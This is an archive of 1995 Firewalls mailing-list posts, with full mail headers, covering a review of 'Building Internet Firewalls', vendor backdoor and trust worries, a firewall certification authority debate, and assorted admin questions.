comp-security-misc@cs.utexas.edu, techs@ulysses.sis.ualberta.ca, secsig-l@decus.ca, roberts@mukluk.hq.decus.ca X-VMSmail-To: @REVIEW X-VMSmail-CC: @BOKLSTRV,MX%"risks@csl.sri.com",MX%"firewalls@greatcircle.com",MX%"comp-security-misc@cs.utexas.edu",MX%"techs@ulysses.sis.ualberta.ca",MX%"secsig-l@decus.ca",ROBERTS Message-ID: <0099629C.F44652C0.14783@mukluk.hq.decus.ca> Subject: "Building Internet Firewalls" by Chapman/Zwicky Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [I received a draft copy of this, so some details either aren't available or might have changed. Last word I had from the publisher, this is due for release on Tuesday - rms] BKBUINFI.RVW 950712 "Building Internet Firewalls", Chapman/Zwicky, 1995, 1-56592-124-0 %A Brent Chapman %A Elizabeth Zwicky %C 103 Morris Street, Suite A, Sebastopol, CA 95472 %D 1995 %G 1-56592-124-0 %I O'Reilly & Associates, Inc. %O 800-998-9938 707-829-0515 fax: 707-829-0104 nuts@ora.com %O 519-283-6332 800-528-9994 rick.brown@onlinesys.com %T "Building Internet Firewalls" Cheswick and Bellovin's "Firewalls and Internet Security" (cf. BKFRINSC.RVW) will continue to be seen as the classic reference with the seriously technical crowd. Chapman and Zwicky, however, have here created the first reference for the more normal run of system administrators: those whose lives do not revolve around hacking the UNIX kernel. Part one could almost stand as a separate book, itself. It is an introduction to firewalls. More, it is a very down-to-earth and practical guide to evaluating security needs and planning for security systems and practices. The writing is completely clear, and the explanations first-rate. Chapter four, on firewall architectures, is a perfect introduction for the manager who, while not having a technical background, must lead or administer a security project. Part two gets into more technical details of firewall construction and the communications needs for Internet services. The writing, though, is still clear and easily accessible to any intelligent reader. Part three covers maintenance and administrative work. Appendices list information and software resources as well as a brief introduction to TCP/IP basics. This is the first book which truly explains, to the non-specialist, the various factors and functions involved in firewall choice and construction. For those building their own and for those evaluating vendor proposals, this book is a must. copyright Robert M. Slade, 1995 BKBUINFI.RVW 950712 ============= Vancouver ROBERTS@decus.ca | "The client interface Institute for Robert_Slade@sfu.ca | is the boundary of Research into Rob_Slade@mindlink.bc.ca | trustworthiness." User rslade@freenet.vancouver.bc.ca| - Tony Buckland, UBC Security Canada V7K 2G6 | From firewalls-owner Sun Sep 10 18:00:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16354 for firewalls-outgoing; Sun, 10 Sep 1995 17:33:09 -0700 Received: from state-opera.comp.vuw.ac.nz (state-opera.comp.vuw.ac.nz [130.195.5.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA16340 for ; Sun, 10 Sep 1995 17:33:03 -0700 X400-Received: by mta state-opera.comp.vuw.ac.nz in /PRMD=NewZnet/ADMD=Synet/C=NZ/; Relayed; Mon, 11 Sep 1995 12:19:51 +1200 X400-Received: by /PRMD=Postie/ADMD=Synet/C=NZ/; Relayed; Mon, 11 Sep 1995 12:07:22 +1200 X400-Received: by /PRMD=NewZnet/ADMD=Synet/C=NZ/; Relayed; Mon, 11 Sep 1995 12:05:18 +1200 X400-Received: by /PRMD=NewZnet/ADMD=Synet/C=NZ/; Relayed; Sun, 10 Sep 1995 17:29:26 +1200 Date: Sun, 10 Sep 1995 17:29:26 +1200 X400-Originator: firewalls-owner@GreatCircle.COM X400-Recipients: non-disclosure:; X400-MTS-Identifier: [/PRMD=NewZnet/ADMD=Synet/C=NZ/;<0099629C.F44652C0.14783@mukluk.] X400-Content-Type: P2-1984 (2) Content-Identifier: (l)l(r)q(l)r(r)B Alternate-Recipient: Allowed From: a Message-ID: <0099629C.F44652C0.14783@mukluk.hq.decus.ca> To: tolist@postie.synet.net.nz, cclist@postie.synet.net.nz Subject: "Building Internet Firewalls" by Chapman/Zwicky X-Comment: To: header was truncated; missing 2 entries. X-VMSmail-To: @REVIEW X-VMSmail-CC: @BOKLSTRV,MX%"risks@csl.sri.com",MX%"firewalls@greatcircle.com",MX%"comp-security-misc@cs.utexas.edu",MX%"techs@ulysses.sis.ualberta.ca",MX%"secsig-l@decus.ca",ROBERTS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Mon Sep 11 00:30:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA22177 for firewalls-outgoing; Mon, 11 Sep 1995 00:20:42 -0700 Received: from gatekeep.genmagic.com (gatekeep.genmagic.com [192.216.16.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA22168; Mon, 11 Sep 1995 00:20:38 -0700 Received: from (genmagic.genmagic.com [10.1.4.12]) by gatekeep.genmagic.com (8.6.9/8.6.9) with SMTP id QAA16163; Sun, 10 Sep 1995 16:04:05 -0700 Received: from abulafia.genmagic.com by genmagic (4.1/SMI-4.1/JBS) id AA01462; Mon, 11 Sep 95 00:10:18 PDT Received: by abulafia.genmagic.com (931110.SGI/930416.SGI) for @genmagic.genmagic.com:Brent@GreatCircle.COM id AA14024; Mon, 11 Sep 95 00:10:29 -0700 Date: Mon, 11 Sep 95 00:10:29 -0700 From: jet@abulafia.genmagic.com (J. Eric Townsend) Message-Id: <9509110710.AA14024@abulafia.genmagic.com> To: Mike Ciavarella Cc: Brent@GreatCircle.COM (Brent Chapman), bdboyle@maverick.erenj.com, firewalls@GreatCircle.COM Subject: Re: Interpreting CERT advisories In-Reply-To: <199509101016.UAA02903@phyto.cyber.com.au> References: <199509101016.UAA02903@phyto.cyber.com.au> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "mikec" == Mike Ciavarella writes: mikec> It's also a (very rough) indicator of the types of machines ppl mikec> have (and have access to). How many advisories or potential mikec> holes have been reported on net-connected MVS boxen? How many MVS systems are plugged directly into the internet? How many are actually used for TCP/IP related services? (Where's my Mosaic for MVS? :-) IMHO, Suns get broken into all the time because: -- everybody has one to practice on -- they were designed with being useful in mind. --jet From firewalls-owner Mon Sep 11 01:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA22327 for firewalls-outgoing; Mon, 11 Sep 1995 00:43:41 -0700 Received: from warrane.connect.com.au (warrane.connect.com.au [192.189.54.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA22320 for ; Mon, 11 Sep 1995 00:43:37 -0700 Received: from mailgate.UUCP (root@localhost) by warrane.connect.com.au with UUCP id RAA01674 (8.6.12/IDA-1.6 for GreatCircle.COM!Firewalls); Mon, 11 Sep 1995 17:41:35 +1000 Message-Id: Date: Mon, 11 Sep 95 16:36 EST X-Sender: schan@dev X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Stanley Chan Subject: Re: Firewalls-Digest V4 #518 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >1. It's Mosad and not Masad >2. I wish someone would tell me about all those conspiracies I'm supposed > to be a part of. >3. The question here is a legit one, how can you trust a firewall when > you don't know what the code looks like? >4. Posting from an anon account won't stop the Masad from finding you, > and now that you've blown their cover, I guess they'll have to kill you. > Well I think if we have to worry about a firewall's source code, I would spend my time worrying about all the kernels problem instead. How can you trust a kernel or OS from HP, SUN, DIGITAL or any vendor who wrote UNIX os for sale and yet they never ever review their source code to you for certification. May be you can argue that the US Defense have looked at it. But how can people from outside the US trust it. How do we know that the code did not include a backdoor to let some one in secretly or download your secret documents in the system to a distant machine. Stanley Chan (System Administrator) E-mail schan@gcau.com.au (Ph 617-38771016 Fax 617-38771120) Snail Golden Casket Art Union Office Locked bag 7, Coorparoo DC Qld Australia 4151 From firewalls-owner Mon Sep 11 05:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA26618 for firewalls-outgoing; Mon, 11 Sep 1995 05:13:15 -0700 Received: from bn.com ([161.221.10.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA26611 for ; Mon, 11 Sep 1995 05:13:13 -0700 Received: from mhs-gw.bn.com by bn.com (5.0/SMI-SVR4) id AA00600; Mon, 11 Sep 1995 08:11:26 +0500 Message-Id: <9509111211.AA00600@bn.com> From: VMIRAGLI@bn.com (Vincent Miragliotta) Date: Mon, 11 Sep 1995 08:04 EST To: firewalls@greatcircle.com Subject: Subscription content-length: 79 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm not receiving any more mail from the Firewall Forum. Was I de-subscribed? From firewalls-owner Mon Sep 11 05:37:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA26880 for firewalls-outgoing; Mon, 11 Sep 1995 05:28:41 -0700 Received: from zeus.danosi.dk (zeus.danosi.dk [193.88.50.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA26873 for ; Mon, 11 Sep 1995 05:28:33 -0700 Received: from notesgw.danosi.dk by zeus.danosi.dk (4.1/SMI-4.1) id AA06004; Mon, 11 Sep 95 14:25:40 +0200 Received: by notesgw.danosi.dk (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA0077; Mon, 11 Sep 95 14:29:36 +0100 Message-Id: <9509111329.AA0077@notesgw.danosi.dk> Received: from DANOSI with "Lotus Notes Mail Gateway for SMTP" id 163E8F913BCEB771C125623400438A56; Mon, 11 Sep 95 14:29:35 To: firewalls From: Carsten Rhod Gregersen/DANOSI_Aarhus/DK Date: 11 Sep 95 14:23:26 Subject: Email guards Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for email guards, something like the TIS-TMEG email guard as a filter to sendmail or similar mail server programs (look at their www page for more info www.tis.com). Is TIS the only manufactor of such software ??? (I've spent quite some time surfing around, with no results) Regards Carsten Rhod Gregersen From firewalls-owner Mon Sep 11 06:30:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA28167 for firewalls-outgoing; Mon, 11 Sep 1995 06:28:40 -0700 Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA28159 for ; Mon, 11 Sep 1995 06:28:34 -0700 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id XAA14374 (8.6.12/IDA-1.6 for ); Mon, 11 Sep 1995 23:27:09 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id XAA12886 for firewalls@greatcircle.com; Mon, 11 Sep 1995 23:27:01 +1000 Date: Mon, 11 Sep 1995 23:27:01 +1000 From: Julian Assange Message-Id: <199509111327.XAA12886@suburbia.net> To: firewalls@greatcircle.com Subject: wank worm Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know this is off target, but what the heck. I am trying to locate specific information that was used in the Wank Worm circa mid 1989. In particular I am trying to locate the fortune cookie file that was included in it. I believe the fortunes were pull from the bsd fortune program. That said finding which versions of fortune where extant during that period and then finding an existing copy of that version now has become a little trying. If anyone on this list had person experiance with the worm at the time or can point me to ancient versions of fortune (oldest I could locate was bsd42/tahoe/reno) I'd certainly appreciate it. -Julian Assange (proff@suburbia.net) From firewalls-owner Mon Sep 11 06:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA27747 for firewalls-outgoing; Mon, 11 Sep 1995 06:07:00 -0700 Received: from OAG.STATE.TX.US (smtpgate.oag.state.tx.us [204.64.38.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA27740 for ; Mon, 11 Sep 1995 06:06:57 -0700 Received: from OCS-Message_Server by OAG.STATE.TX.US with Novell_GroupWise; Mon, 11 Sep 1995 08:10:15 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 11 Sep 1995 08:04:53 -0600 From: Richard Owen To: firewalls@greatcircle.com Subject: BOS: firewall certification authority -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I agree with this concern. The National Research Council issued a report on sensitive but unclassified computing in the US entitled "Computers at Risk." In that report they suggested that an independent organization be formed, the Information Security Foundation. We are about a talking non-government organization under the direction and review of industry and the information security profession {of course with an interface to government). It is hoped that this organization would be given the authority to reduce export restrictions. As President of ISSA, I am very interested in seeing this happen. I have even proposed that ISSA would help to establish such an organization. IMPORTANT POINT: The ISF (now IISF) would not be part of ISSA. It is bigger than ISSA or any organization. The IISF needs to not only provide certification (firewalls, systems, people, etc.) and testing but standards development and research. ISSA currently has a committee that is trying to define the Generally Accepted System Security Principles (GSSP) as also called for in the Computers at Risk report. The IISF should be a place to pull all of our activities into a unified direction. This is what I have proposed to a working group of the President's National Security & Telecommunications Advisory Council. >>> Marcus J. Ranum 09/08/95 10:32pm >>> >OK folks, imagine there was to be a firewall certification authority. Who >would you want them to be? Who do you trust? First ask if there should be one at all. Not all firewalls are the same; many have very different design goals and objectives. For a single authority to certify a firewall will imply a single authority imposing its idea of "correct design": a role NSA has adopted in the past with varying levels of success and questionable benefits to the community. From firewalls-owner Mon Sep 11 07:00:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA28231 for firewalls-outgoing; Mon, 11 Sep 1995 06:33:08 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA28224 for ; Mon, 11 Sep 1995 06:33:04 -0700 Received: from uucp6.UU.NET by relay3.UU.NET with SMTP id QQzgss25704; Mon, 11 Sep 1995 09:31:44 -0400 Received: from brite.UUCP by uucp6.UU.NET with UUCP/RMAIL ; Mon, 11 Sep 1995 09:31:44 -0400 Received: from usrpc10.wichita.brite.com by brite.wichita.brite.com (5.65/1.35) id AA03072; Mon, 11 Sep 95 08:31:35 -0500 Date: Mon, 11 Sep 95 08:27:57 CDT From: Shane Kinsch Subject: httpd compilation To: Firewall X-Mailer: Chameleon ARM_55, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have another UNIX box that were trying denote as our web server and I guess my question is: Has anyone out there been able to compile cern's httpd for Interactive UNIX SysV Rel3.2 V3.01? Just curious because I need help! _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ _/ Shane T Kinsch BRITE VOICE SYSTEMS, INC. _/ _/ shane.kinsch@brite.com UNIX TECHNICAL ENGINEER _/ _/ Wichita, KS USA "MIME is ok here" _/ _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ From firewalls-owner Mon Sep 11 07:36:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA28910 for firewalls-outgoing; Mon, 11 Sep 1995 07:07:43 -0700 Received: from inet-gw-0.ey.ca (inet-gw-0.EY.CA [132.220.23.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA28903 for ; Mon, 11 Sep 1995 07:07:39 -0700 Received: (from stacy@localhost) by inet-gw-0.ey.ca (8.6.11/8.6.10) id KAA12701; Mon, 11 Sep 1995 10:05:03 -0400 Received: from server-001.ey.ca (server-001.EY.CA [132.220.12.5]) by inet-gw-0.ey.ca (8.6.11/8.6.10) with SMTP id WAA08340 for ; Sun, 10 Sep 1995 22:20:10 -0400 Message-Id: <9509110219.AA17961@server-001.ey.ca> From: stacy@ey.ca (Stacy L. Millions) To: dmurphy@coltrane.cwa.com Cc: Firewalls@greatcircle.com Subject: Re: Corporate Audits Date: Mon, 11 Sep 1995 01:57:31 GMT Reply-To: stacy@ey.ca Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 8 Sep 95 14:48:20 -0400, you wrote: >Gentlebeings, > Better yet, does anybody work for >one of the Used-To-Be-Big-7 accounting firms and know what they're doing >internally about this? Well, I could tell you; but then I would have to kill you :-) Sorry, couldn't resist. Seriously, don't you think it would be of questionable ethics to discuss internal security policy for on of the 'Big-7' (or six or eight or however many after the last round of mergers, aquisitions and split ups :-). If we audited your books, would you like us discussing such matter. Or more appropriately, "if you could afford the lawyers that some of our clients can afford and we audited your books ....":-) I think you get the point. On the other hand, it would make a great series for 'Dilbert', wouldn't it? -stacy From firewalls-owner Mon Sep 11 07:43:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA29329 for firewalls-outgoing; Mon, 11 Sep 1995 07:26:06 -0700 Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA29322 for ; Mon, 11 Sep 1995 07:25:58 -0700 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id JAA09289; Mon, 11 Sep 1995 09:44:38 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id JAA09285; Mon, 11 Sep 1995 09:44:37 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id JAA08738; Mon, 11 Sep 1995 09:24:31 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id JAA21560; Mon, 11 Sep 1995 09:24:30 -0500 From: Rick Smith Message-Id: <199509111424.JAA21560@shade.sctc.com> Subject: Re: BOS: firewall certification authority To: mjr@iwi.com Date: Mon, 11 Sep 1995 09:24:30 -0500 (CDT) Cc: firewalls@greatcircle.com, rpower@mfi.com In-Reply-To: <199509090432.AAA15521@switchblade.iwi.com> from "Marcus J. Ranum" at Sep 9, 95 00:32:57 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2028 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Would it be worthwhile for us to consider how well/poorly various models of "certification" have worked in other industries or disciplines? I agree that the "Underwriters Laboratories" model won't work for computer devices, regardless if you're certifying "security" or "reliability" or some other global property. Computer based devices are just too complex compared with UL's typical device to test. Right now there's more of a "building inspector" flavor to computer security implementation. Somebody puts in a firewall (using better or worse techniques, experience, assumptions) and somebody else comes along and reviews it. The reviewer checks off compliance with building codes: a particular building may wildy exceed codes or, more often, will pass with perhaps a few things that must be changed. However, the building inspectors have a written set of standards to apply (for better or worse) while firewalls analysts (or whatever the title is) simply apply some undefined intuition and wrap it in convincing prose. Or worse, they run some canned procedure and document the results. I have only a superficial understanding of FDA rules for approving drugs, but it almost sounds like a similar problem. The interaction of drug and human body is supposed to be analyzed and quantified based on statistical "trials" as well as formal arguments regarding the drug's design and the drug company's procedures for developing such things. There's no expectation that a given drug will work for any patient. The riskier ones are administered under the watchful eye of a trained professional with periodic followup. But the resulting procedure is obscenely expensive and time consuming. Not too different from NCSC formal evaluations, actually. I don't believe we can specify a perfect solution for the problem. Can we specify something (anything?) that's better than nothing and produces the least amount of pain and misdirection on both the industry and our customers? Rick. smith@sctc.com secure computing corporation From firewalls-owner Mon Sep 11 08:32:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA00821 for firewalls-outgoing; Mon, 11 Sep 1995 08:22:56 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA00814 for ; Mon, 11 Sep 1995 08:22:47 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA18746; Mon, 11 Sep 95 11:19:17 -0400 Date: Mon, 11 Sep 95 11:19:16 -0400 Message-Id: <9509111519.AA18746@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Sounds like the politicians are gathering Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Someone claiming to be the president of the ISSA (no signature) rites: >I agree with this concern. The National Research Council issued a >report on sensitive but unclassified computing in the US entitled >"Computers at Risk." In that report they suggested that an >independent organization be formed, the Information Security ^^^^^^^^^^^ >Foundation. > We are about a talking non-government organization >under the direction and review of industry and the information >security profession {of course with an interface to government). >It is hoped that this organization would be given the authority to >reduce export restrictions. Note that expertise in the subject does not seem to be a requirement (sorry but I have seen too many of these "executive-level" committees formed that spend years trying to figure out an agenda. Have walked out of meetings that I could see headed that way. Also really needs to be *International* organization & do not see how "authority to reduce export restrictions" plays - that is pure *politics*. IFIP might make a good parent but the real question is funding. SAE is funded by members and was created by engineers. Those funded by government grants tend to be politically correct. >IMPORTANT POINT: The ISF (now IISF) would >not be part of ISSA. It is bigger than ISSA or any organization. >The IISF needs to not only provide certification (firewalls, >systems, people, etc.) and testing but standards development and >research. Agree with this but is sounding more like a political plum by the moment & can see there are plenty of chiefs ready to run it. Warmly, Padgett ps not down on the concept, just want to be sure of the agenda. Have seen too many such "councils" in the past where the appointees were those who looked good on TV. From firewalls-owner Mon Sep 11 09:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA01128 for firewalls-outgoing; Mon, 11 Sep 1995 08:34:32 -0700 Received: from OAG.STATE.TX.US (smtpgate.oag.state.tx.us [204.64.38.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA01107 for ; Mon, 11 Sep 1995 08:34:26 -0700 Received: from OCS-Message_Server by OAG.STATE.TX.US with Novell_GroupWise; Mon, 11 Sep 1995 10:37:25 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 11 Sep 1995 10:32:10 -0600 From: Richard Owen To: firewalls@GreatCircle.COM Subject: Re: BOS: firewall certification authority -Reply -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ISSA stands for the Information Systems Security Association. We are the non-profit organization for people involved in the protection of information assets (Computer Security, Data Security, EDP Security, etc.). In other words a collection of security managers, security administrators, data base administrators, edp auditors, disaster recovery personnel, system programmers, system designers, professors, etc. For example: I am the Information Security Administrator (manager) for the Texas Attorney General, my VP is a Data Security Manager for Wells Fargo, Membership Director is the VP of Data Security for First USA, etc. Of course, as pres, I would be very pleased to have my headquarters send you more info. IISF is the International Information Security Foundation - Name had to be changed because someone grabbed up the ISF name. The intent of IISF is still the same as noted in the Computers at Risk book. (establishe standards, certification, testing, coordination between public and private and between US and foreign) I see it as an opportunity for us to define our own destiny. Rich Owen >>> 09/11/95 08:57am >>> Please clue in the clueless. What is ISSA? What is IISF? Aside from reducing export restrictions, what is ISF supposed to do? Tenna Sakai (tws@wh.bayer.com) Bayer Research Center From firewalls-owner Mon Sep 11 09:02:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA00549 for firewalls-outgoing; Mon, 11 Sep 1995 08:04:05 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA00539 for ; Mon, 11 Sep 1995 08:03:58 -0700 From: tws@wh.bayer.com Received: from wh.bayer.com by relay1.UU.NET with SMTP id QQzgsy21645; Mon, 11 Sep 1995 11:02:08 -0400 Received: from mrcs1 ([140.250.41.24]) by wh.bayer.com (8.6.12/8.6.12) with SMTP id KAA22859; Mon, 11 Sep 1995 10:56:53 -0400 Received: by mrcs1 (5.64/X1.00) id AA25265; Mon, 11 Sep 95 10:57:04 -0400 Date: Mon, 11 Sep 95 10:57:04 -0400 Message-Id: <9509111457.AA25265@mrcs1> To: Richard.Owen@OAG.STATE.TX.US, firewalls@GreatCircle.COM Subject: Re: BOS: firewall certification authority -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please clue in the clueless. What is ISSA? What is IISF? Aside from reducing export restrictions, what is ISF supposed to do? Tenna Sakai (tws@wh.bayer.com) Bayer Research Center > From: Richard Owen > To: firewalls@GreatCircle.COM > Subject: BOS: firewall certification authority -Reply > I agree with this concern. The National Research Council issued a > report on sensitive but unclassified computing in the US entitled > "Computers at Risk." In that report they suggested that an > independent organization be formed, the Information Security > Foundation. We are about a talking non-government organization > under the direction and review of industry and the information > security profession {of course with an interface to government). > It is hoped that this organization would be given the authority to > reduce export restrictions. > As President of ISSA, I am very interested in seeing this happen. > I have even proposed that ISSA would help to establish such an > organization. IMPORTANT POINT: The ISF (now IISF) would > not be part of ISSA. It is bigger than ISSA or any organization. > The IISF needs to not only provide certification (firewalls, > systems, people, etc.) and testing but standards development and > research. ISSA currently has a committee that is trying to define > the Generally Accepted System Security Principles (GSSP) as also > called for in the Computers at Risk report. The IISF should be a > place to pull all of our activities into a unified direction. This is > what I have proposed to a working group of the President's > National Security & Telecommunications Advisory Council. From firewalls-owner Mon Sep 11 09:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03101 for firewalls-outgoing; Mon, 11 Sep 1995 09:22:46 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA03090 for ; Mon, 11 Sep 1995 09:22:43 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id LAA07815 for GreatCircle.COM!Firewalls; Mon, 11 Sep 1995 11:07:58 -0500 Received: by ris1.nmti.com (smail2.5) id AA01719; 11 Sep 95 10:17:29 CDT (Mon) Received: by sonic.nmti.com; id AA24311; Mon, 11 Sep 1995 10:44:13 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509111544.AA24311@sonic.nmti.com.nmti.com> Subject: Re: Firewalls-Digest V4 #518 To: schan@gcau.com.au (Stanley Chan) Date: Mon, 11 Sep 1995 10:44:13 -0500 (CDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Stanley Chan" at Sep 11, 95 04:36:00 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 375 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Well I think if we have to worry about a firewall's source code, I would > spend my time worrying about all the kernels problem instead. > How can you trust a kernel or OS from HP, SUN, DIGITAL or any vendor who > wrote UNIX os for sale and yet they never ever review their source code to > you for certification. http://freebsd.org/ http://netbsd.org/ http://bsdi.com/ From firewalls-owner Mon Sep 11 10:35:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05483 for firewalls-outgoing; Mon, 11 Sep 1995 10:12:34 -0700 Received: from strydr.strydr.com (strydr.strydr.com [199.217.201.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA05474 for ; Mon, 11 Sep 1995 10:12:31 -0700 Received: (from ds3721@localhost) by strydr.strydr.com (8.6.12/8.6.11) id MAA05143; Mon, 11 Sep 1995 12:09:51 -0500 From: David Schnardthorst Message-Id: <199509111709.MAA05143@strydr.strydr.com> Subject: Re: Firewalls-Digest V4 #518 To: peter@nmti.com (Peter da Silva) Date: Mon, 11 Sep 1995 12:09:50 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <9509111544.AA24311@sonic.nmti.com.nmti.com> from "Peter da Silva" at Sep 11, 95 10:44:13 am Organization: Stryder Communications, Inc. Address: 869 St. Francois, Florissant, Mo. 63031 Telephone: (314)838-6839 Fax: (314)838-8527 X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1768 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In the Original, Peter da Silva Says > >> Well I think if we have to worry about a firewall's source code, I would >> spend my time worrying about all the kernels problem instead. >> How can you trust a kernel or OS from HP, SUN, DIGITAL or any vendor who >> wrote UNIX os for sale and yet they never ever review their source code to >> you for certification. > >http://freebsd.org/ >http://netbsd.org/ >http://bsdi.com/ Good Point, Trust is believing that the person in question is not going to mislead you. In a since, this whole discussion is turning into a situation where every firewall vendor is Guilty until proven innocent. If they are going to build a firewall product for people to purchase, do you believe they would risk putting a back door in the product on purpose. Even if they have the right statements saying that they are not responsible, if they put them in on purpose, and it is proven in court, they may still be liable. You have to trust them to do it right, or you should do it yourself. What other options are there. Who is to say that having a Firewall Certification Committee would make sure there are no problems with a firewall? They could be just like the vendor and falsify information, or let it pass through. Unless something comes up to disprove a vendors credibility, you have to trust them. ============================================================================ David Schnardthorst System Administrator * Phone: (314)838-6839 Stryder Communications, Inc. * Fax: (314)838-8527 869 St. Francois * E-Mail: ds3721@strydr.com Florissant, MO 63031 * URL: http://www.strydr.com ============================================================================ From firewalls-owner Mon Sep 11 11:02:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA07227 for firewalls-outgoing; Mon, 11 Sep 1995 10:56:31 -0700 Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA07205 for ; Mon, 11 Sep 1995 10:56:19 -0700 From: Mark_W_Loveless@smtp.bnr.com Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA10185; Mon, 11 Sep 95 12:53:09 CDT Received: from cc:Mail by smtp.bnr.com id AA810849184; Mon, 11 Sep 95 12:50:18 CST Date: Mon, 11 Sep 95 12:50:18 CST Message-Id: <9508118108.AA810849184@smtp.bnr.com> To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security), firewalls@greatcircle.com Subject: Re: Sounds like the politicians are gathering Sender: 